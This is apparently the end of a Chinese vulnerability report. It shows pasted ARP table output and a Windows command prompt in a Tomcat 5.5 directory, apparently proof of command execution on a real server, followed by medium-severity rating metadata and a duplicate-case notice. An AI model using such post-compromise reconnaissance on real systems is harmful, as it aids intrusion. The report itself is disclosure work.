00-46-4b-aa-0c-25 动态 **.**.**.** ff-ff-ff-ff-ff-ff 静态 **.**.**.** 01-00-5e-00-00-02 静态 **.**.**.**2 01-00-5e-00-00-16 静态 **.**.**.**51 01-00-5e-00-00-fb 静态 **.**.**.**52 01-00-5e-00-00-fc 静态 **.**.**.** 01-00-5e-19-d8-ab 静态 **.**.**.** 01-00-5e-2e-db-0e 静态 **.**.**.** 01-00-5e-39-49-6f 静态 **.**.**.** 01-00-5e-49-e1-74 静态 **.**.**.** 01-00-5e-5a-ce-79 静态 **.**.**.** 01-00-5e-12-3e-24 静态 **.**.**.** 01-00-5e-12-3e-24 静态 **.**.**.** 01-00-5e-18-50-de 静态 **.**.**.** 01-00-5e-28-18-79 静态 **.**.**.** 01-00-5e-43-37-3b 静态 **.**.**.** 01-00-5e-79-ab-af 静态 **.**.**.** 01-00-5e-16-2c-3a 静态 **.**.**.** 01-00-5e-24-d5-b4 静态 **.**.**.** 01-00-5e-51-09-08 静态 **.**.**.** 01-00-5e-58-7f-77 静态 **.**.**.** 01-00-5e-68-a0-b7 静态 **.**.**.** 01-00-5e-07-66-2a 静态 **.**.**.** 01-00-5e-19-5b-7d 静态 **.**.**.** 01-00-5e-1e-4c-31 静态 **.**.**.** 01-00-5e-2f-74-70 静态 **.**.**.** 01-00-5e-63-2b-78 静态 **.**.**.** 01-00-5e-70-f0-de 静态 **.**.**.** 01-00-5e-41-e5-72 静态 **.**.**.** 01-00-5e-51-78-b4 静态 **.**.**.** 01-00-5e-08-65-7b 静态 **.**.**.** 01-00-5e-1e-f5-b6 静态 **.**.**.** 01-00-5e-37-89-71 静态 **.**.**.** 01-00-5e-51-55-da 静态 **.**.**.** 01-00-5e-56-ee-7c 静态 **.**.**.** 01-00-5e-00-00-04 静态 **.**.**.** 01-00-5e-1a-9d-0e 静态 **.**.**.** 01-00-5e-41-09-df 静态 **.**.**.** 01-00-5e-6e-2d-3a 静态 **.**.**.** 01-00-5e-3c-36-3b 静态 **.**.**.** 01-00-5e-43-c9-b6 静态 **.**.**.** 01-00-5e-44-d3-74 静态 **.**.**.** 01-00-5e-4d-94-b7 静态 **.**.**.** 01-00-5e-50-f2-2a 静态 **.**.**.** 01-00-5e-78-97-1b 静态 **.**.**.** 01-00-5e-1a-e3-2a 静态 **.**.**.** 01-00-5e-25-37-3a 静态 **.**.**.** 01-00-5e-06-42-71 静态 **.**.**.** 01-00-5e-25-b2-3c 静态 **.**.**.** 01-00-5e-35-96-af 静态 **.**.**.** 01-00-5e-60-84-b6 静态 **.**.**.** 01-00-5e-6d-78-0e 静态 **.**.**.** 01-00-5e-0e-5d-7d 静态 **.**.**.** 01-00-5e-10-ad-dc 静态 **.**.**.** 01-00-5e-36-c3-73 静态 **.**.**.** 01-00-5e-49-f0-71 静态 **.**.**.** 01-00-5e-6c-76-6a 静态 **.**.**.** 01-00-5e-26-b6-6e 静态 **.**.**.** 01-00-5e-3c-8d-77 静态 **.**.**.** 01-00-5e-3e-2f-3a 静态 **.**.**.** 01-00-5e-45-20-78 静态 **.**.**.** 01-00-5e-0f-59-de 静态 **.**.**.** 01-00-5e-1f-61-71 静态 **.**.**.** 01-00-5e-6c-f5-71 静态 **.**.**.** 01-00-5e-31-dc-73 静态 **.**.**.** 01-00-5e-38-46-da 静态 **.**.**.** 01-00-5e-5a-24-6a 静态 **.**.**.** 01-00-5e-5e-c9-73 静态 **.**.**.** 01-00-5e-6a-33-3a 静态 **.**.**.** 01-00-5e-13-3f-71 静态 **.**.**.** 01-00-5e-3b-52-31 静态 **.**.**.** 01-00-5e-63-20-b6 静态 **.**.**.** 01-00-5e-1f-9e-7b 静态 **.**.**.** 01-00-5e-28-9f-73 静态 **.**.**.** 01-00-5e-33-16-24 静态 **.**.**.** 01-00-5e-36-e4-73 静态 **.**.**.** 01-00-5e-44-82-dd 静态 **.**.**.** 01-00-5e-60-50-01 静态 **.**.**.** 01-00-5e-67-55-01 静态 **.**.**.** 01-00-5e-67-e8-dd 静态 **.**.**.** 01-00-5e-31-40-de 静态 **.**.**.** 01-00-5e-36-ad-3b 静态 **.**.**.** 01-00-5e-4a-15-74 静态 **.**.**.** 01-00-5e-4c-dc-3a 静态 **.**.**.** 01-00-5e-52-70-70 静态 **.**.**.** 01-00-5e-5c-dc-0e 静态 **.**.**.** 01-00-5e-5d-42-b7 静态 **.**.**.** 01-00-5e-2f-b8-6e 静态 **.**.**.** 01-00-5e-4d-b1-6e 静态 **.**.**.** 01-00-5e-32-74-31 静态 **.**.**.** 01-00-5e-4e-cf-01 静态 **.**.**.** 01-00-5e-11-71-7c 静态 **.**.**.** 01-00-5e-25-46-75 静态 **.**.**.** 01-00-5e-36-c9-73 静态 **.**.**.** 01-00-5e-61-d4-3a 静态 **.**.**.** 01-00-5e-26-48-7d 静态 **.**.**.** 01-00-5e-31-cb-b7 静态 **.**.**.** 01-00-5e-39-d0-de 静态 **.**.**.** 01-00-5e-6a-42-7d 静态 **.**.**.** 01-00-5e-00-00-01 静态 **.**.**.** 01-00-5e-01-d9-0e 静态 **.**.**.** 01-00-5e-2d-8e-af 静态 **.**.**.** 01-00-5e-55-20-6a 静态 **.**.**.** 01-00-5e-02-ee-7c 静态 **.**.**.** 01-00-5e-2a-fb-76 静态 **.**.**.** 01-00-5e-50-d6-73 静态 **.**.**.** 01-00-5e-6d-e9-7a 静态 **.**.**.** 01-00-5e-1a-8e-b6 静态 **.**.**.** 01-00-5e-08-8d-77 静态 **.**.**.** 01-00-5e-2a-80-77 静态 **.**.**.** 01-00-5e-33-d2-73 静态 **.**.**.** 01-00-5e-79-b1-6e 静态 **.**.**.** 01-00-5e-05-05-05 静态 **.**.**.** 01-00-5e-20-5c-2a 静态 **.**.**.** 01-00-5e-47-4d-6f 静态 **.**.**.** 01-00-5e-64-18-74 静态 **.**.**.** 01-00-5e-15-e5-72 静态 **.**.**.** 01-00-5e-1e-1a-b7 静态 **.**.**.** 01-00-5e-24-e9-79 静态 **.**.**.** 01-00-5e-2c-a7-dc 静态 **.**.**.** 01-00-5e-3a-5c-7d 静态 **.**.**.** 01-00-5e-7f-02-02 静态 **.**.**.** 01-00-5e-7f-ff-fa 静态 **.**.**.** ff-ff-ff-ff-ff-ff 静态 D:\Tomcat 5.5_APP\apache-tomcat-5.5.35_report-9080-slt\bin\>
加强安全意识
危害等级:中
漏洞Rank:10
确认时间:2016-05-11 15:51
漏洞重复,CNVD不在重复处置。
暂无
